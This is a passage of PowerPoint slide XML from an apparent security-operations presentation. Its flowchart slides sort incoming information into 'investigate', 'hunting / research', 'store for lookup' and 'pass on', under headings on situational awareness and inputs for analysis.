                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>situational awareness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4E0B6F-3C7D-5B43-BF69-FFE0FF1D76ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="4222750"/>
            <a:ext cx="2305050" cy="639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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>know what is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>happening</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13321" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B074832-F757-CE4C-B4D7-078E7CB07D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3017838" y="5226050"/>
            <a:ext cx="2835275" cy="639763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B2B2B2"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evaluation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13322" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1963DA3-3E74-544E-A539-18A207F347A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="5226050"/>
            <a:ext cx="2305050" cy="639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Lst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>know how well things work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF0C4569-69D2-0040-B9DD-65803628C31C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2267744" y="3621088"/>
            <a:ext cx="648072" cy="567994"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464EE2BA-1442-EE44-8E79-5D0EBFD8C9F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2226729" y="4473079"/>
            <a:ext cx="638895" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE027675-79FA-7B41-9F23-ED7EFBBDC4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2176537" y="4758081"/>
            <a:ext cx="739279" cy="787850"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A35324C-54AF-AD4D-A37D-22B331CEF080}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="6472238"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inputs for analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15362" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6CBA5B0-9593-E341-980A-954FF25A1832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="7233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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Different types of input require different approach:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01164973-6474-764B-9EDB-219EFCE5DF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="684213" y="2469357"/>
            <a:ext cx="7545387" cy="3288506"/>
            <a:chOff x="684213" y="2469357"/>
            <a:chExt cx="7545387" cy="3288506"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15363" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CB3EC01-5471-BF41-9629-D1DE7514E584}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="684213" y="3614738"/>
              <a:ext cx="1528762" cy="698500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="666666"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>incoming</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>information</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15366" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D756BFC4-BF74-DE47-B30B-DE4EA02A3F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="2469357"/>
              <a:ext cx="2835275" cy="455613"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC0066"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>actionable enough</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15367" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54C2A2A6-DDB0-ED44-9665-96D98023FCD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="2469357"/>
              <a:ext cx="1828800" cy="455612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC0066"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>investigate</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15369" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88AFF667-C8CF-184A-A68C-08ED308523EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="3236913"/>
              <a:ext cx="2835275" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66CC00"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>might contain sth</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>actionable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15370" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B2412F9-7438-474B-9CC9-8F29FA4AF5CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="3236913"/>
              <a:ext cx="1828800" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="66CC00"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hunting /</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>research</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15372" name="Rectangle 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF3942E-DCA5-2E41-B604-EF1C2181C36E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="4186238"/>
              <a:ext cx="2835275" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC9966"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>useful for correlation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15373" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D9D6690-2245-BD49-B03F-46E97F0C4A2B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="4186238"/>
              <a:ext cx="1828800" cy="639762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="CC9966"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>store for</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>lookup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15375" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E1C0601-8D9E-CD4B-AFE7-B8B551901678}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3017838" y="5118100"/>
              <a:ext cx="2835275" cy="639763"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B2B2B2"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>might be actionable</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>to someone else</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15376" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0652BBEE-D34C-D847-92D3-7179AF55AA79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6400800" y="5118100"/>
              <a:ext cx="1828800" cy="639763"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B2B2B2"/>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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Merriweather Sans" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>pass on</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D95E8D1-33A8-944D-ACA4-499820025E8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
